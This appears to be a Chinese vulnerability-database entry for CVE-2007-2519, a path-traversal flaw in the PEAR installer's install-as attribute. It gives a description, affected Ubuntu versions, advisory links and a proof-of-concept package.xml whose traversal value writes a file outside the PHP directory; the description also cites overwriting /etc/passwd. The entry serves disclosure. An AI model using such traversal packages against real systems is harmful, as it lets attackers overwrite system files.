PEAR INSTALL-AS属性任意文件覆盖漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112870 漏洞类型 路径遍历
发布时间 2007-05-07 更新时间 2007-06-05
CVE编号 CVE-2007-2519 CNNVD-ID CNNVD-200705-428
漏洞平台 Linux CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/30074
https://www.securityfocus.com/bid/24111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-428
|漏洞详情
PEAR(全称PHPExtensionandApplicationRepository)是PHPGroup负责维护的一个PHP扩展及应用的代码仓库。PEAR的安装属性实现上存在漏洞,本地攻击者可能利用此漏洞覆盖系统文件。PEAR安装程序没有对package.xml的install-as属性或标签执行验证,允许攻击者向任意位置安装文件,如果PEAR安装程序以特权用户权限运行的话,就可能覆盖关键的系统文件。用户必须使用PEAR安装程序安装恶意软件包才会受漏洞影响。如果文件包含有类似于以下的install-as属性:或类似于以下的/标签:...则PEAR安装程序就会将INSTALL文件安装到php_dir配置文件所指定最低目录两层之上。例如,如果php_dir为/usr/local/lib/php,install-as属性为../../../../etc/passwd,则PEAR安装程序就会覆盖/etc/passwd文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/24111/info

PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files.

An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations.

This issue affects PEAR 1.0 to 1.5.3. 

create a file named "INSTALL" and save it in the current directory.
Save the following XML as package.xml, and run "pear install package.xml"

If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into
/usr/local/test.php



<?xml version="1.0" encoding="UTF-8"?>
<package version="2.0" xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
 <name>Test_Sec</name>
 <channel>pear.php.net</channel>
 <summary>Test security vulnerability</summary>
 <description>demonstrate install-as vulnerability
 </description>
 <lead>
  <name>Greg Beaver</name>
  <user>cellog</user>
  <email>cellog@php.net</email>
  <active>yes</active>
 </lead>
 <date>2007-03-05</date>
 <version>
  <release>1.6.0</release>
  <api>1.6.0</api>
 </version>
 <stability>
  <release>stable</release>
  <api>stable</api>
 </stability>
 <license uri="http://www.php.net/license">PHP License</license>
 <notes>
    allow up to latest beta version [tias]
 </notes>
 <contents>
  <dir name="/">
   <file name="INSTALL" role="php" />
  </dir> <!-- / -->
 </contents>
 <dependencies>
  <required>
   <php>
    <min>4.3.0</min>
   </php>
   <pearinstaller>
    <min>1.4.3</min>
   </pearinstaller>
  </required>
 </dependencies>
 <phprelease>
  <filelist>
   <install as="../../test.php" name="INSTALL" />
  </filelist>
 </phprelease>

</package>
|受影响的产品
Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu
|参考资料

来源:pear.php.net
链接:http://pear.php.net/advisory-20070507.txt
来源:OSVDB
名称:42108
链接:http://osvdb.org/42108
来源:XF
名称:pear-installer-file-overwrite(34482)
链接:http://xforce.iss.net/xforce/xfdb/34482
来源:UBUNTU
名称:USN-462-1
链接:http://www.ubuntu.com/usn/usn-462-1
来源:BID
名称:24111
链接:http://www.securityfocus.com/bid/24111
来源:MANDRIVA
名称:MDKSA-2007:110
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007:110
来源:VUPEN
名称:ADV-2007-1926
链接:http://www.frsirt.com/english/advisories/2007/1926
来源:SECUNIA
名称:25372
链接:http://secunia.com/advisories/25372
来源:pear.php.net
链接:http://pear.php.net/news/vulnerability2.php